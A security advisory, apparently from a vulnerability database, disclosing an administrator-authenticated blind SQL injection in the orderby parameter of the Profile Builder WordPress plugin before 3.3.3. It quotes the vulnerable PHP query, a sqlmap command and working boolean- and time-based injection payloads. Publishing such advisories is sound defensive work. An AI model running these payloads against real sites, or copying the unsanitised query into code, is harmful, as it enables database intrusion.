Profile Builder & Profile Builder Pro < 3.3.3 – Authenticated Blind SQL Injection

Description

The orderby parameter of the wp-admin/users.php?page=unconfirmed_emails&orderby=email&order=asc page, which is available when the "Email confirmation" setting of the plugin is activated (default is off), is not properly sanitised and validated before being concatenated in a SQL statement, leading to an SQL injection. The issue is exploitable by high privilege users such as administrators.

Proof of Concept

File: profile-builder/features/email-confirmation/class-email-confirmation.php:319-321& 345

/* handle order and orderby attr */
if( !empty( $_REQUEST['orderby'] ) ){
    $orderby = sanitize_text_field( $_REQUEST['orderby'] );
    if( $orderby == 'username' )
        $orderby = 'user_login';
    elseif ( $orderby == 'email' )
        $orderby = 'user_email';
}
else
    $orderby = 'user_login';

[...]

$results = $wpdb->get_results("SELECT * FROM ".$wpdb->base_prefix."signups WHERE $where ORDER BY $orderby $order LIMIT $offset, $per_page");


python3 sqlmap.py -u "http://wptest.loc:82/wp-admin/users.php?orderby=email&page=unconfirmed_emails&order=asc" -p orderby--dbs --cookie="wordpres...."

[...]

sqlmap identified the following injection point(s) with a total of 225 HTTP(s) requests:
---
Parameter: orderby (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: page=unconfirmed_emails&orderby=(SELECT (CASE WHEN (9360=9360) THEN 0x656d61696c ELSE (SELECT 6316 UNION SELECT 3657) END))&order=asc

    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace
    Payload: page=unconfirmed_emails&orderby=(CASE WHEN (8207=8207) THEN SLEEP(5) ELSE 8207 END)&order=asc